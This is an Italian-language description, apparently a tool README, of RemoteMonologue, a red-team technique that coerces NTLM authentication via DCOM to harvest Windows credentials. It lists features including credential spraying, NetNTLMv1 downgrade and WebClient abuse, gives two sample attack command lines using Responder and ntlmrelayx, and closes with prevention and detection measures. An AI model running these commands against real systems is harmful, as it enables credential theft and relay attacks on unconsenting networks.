
Armare DCOM per coercizioni di autenticazione NTLM
RemoteMonologue è una tecnica di raccolta di credenziali Windows che consente il compromesso di utenti remoti sfruttando la chiave RunAs Interactive User e forzando autenticazioni NTLM tramite DCOM.
Leggi RemoteMonologue: Weaponizing DCOM for NTLM Authentication Coercions di X-Force Red per informazioni dettagliate.
🔹 Coercizione dell'autenticazione tramite DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) per attivare un'autenticazione NTLM verso un listener specificato (-auth-to).🔹 Credential Spraying (-spray)
🔹 Attacco di downgrade NetNTLMv1 (-downgrade)
🔹 Abuso del servizio WebClient (-webclient)
🔹 Enumerazione degli utenti (-query)
Nota: Sono richiesti privilegi di amministratore locale sul sistema target.
pip install impacket
Di seguito è riportato un esempio di esecuzione di RemoteMonologue con l'attacco di downgrade NetNTLMv1 utilizzando Responder come listener. Per impostazione predefinita, se non viene specificata alcuna opzione DCOM, lo strumento utilizza l'oggetto DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Di seguito è riportato un altro esempio: questa volta l'attacco viene eseguito utilizzando l'oggetto DCOM FileSystemImage e abilitando il servizio WebClient per ottenere un'autenticazione HTTP, che viene poi inoltrata a LDAP utilizzando ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Per proteggersi da queste tecniche e rilevarle, possono essere implementate diverse misure preventive e di rilevamento.
Misure preventive:
Abilitare la firma LDAP e il binding del canale: Configurare l'imposizione della firma LDAP e il binding del canale sui controller di dominio per proteggere l'endpoint LDAP dagli attacchi relay. Nota: Queste impostazioni saranno applicate per impostazione predefinita a partire da Windows Server 2025.
Aggiornare alle ultime versioni di Windows: Aggiornare i server a Windows Server 2025 e le workstation a Windows 11 versione 24H2 per mitigare gli attacchi di downgrade NetNTLM, poiché NTLMv1 è stato rimosso in queste versioni.
Imporre la firma SMB: Abilitare e imporre la firma SMB sui server Windows per prevenire gli attacchi relay SMB.
Implementare policy di password complesse: Applicare requisiti di password complesse per rendere più difficili gli attacchi di cracking delle password.
Opportunità di rilevamento:
Monitorare l'accesso remoto agli oggetti DCOM: Tracciare l'accesso agli oggetti DCOM interessati e alle loro specifiche Proprietà e Metodi per identificare attività insolite.
Monitorare le modifiche al registro: Monitorare le modifiche alle chiavi di registro RunAs e LmCompatibilityLevel.
Tracciare l'attività del servizio WebClient: Monitorare i casi in cui il servizio WebClient viene abilitato da remoto, poiché viene utilizzato per facilitare le autenticazioni NTLM basate su HTTP.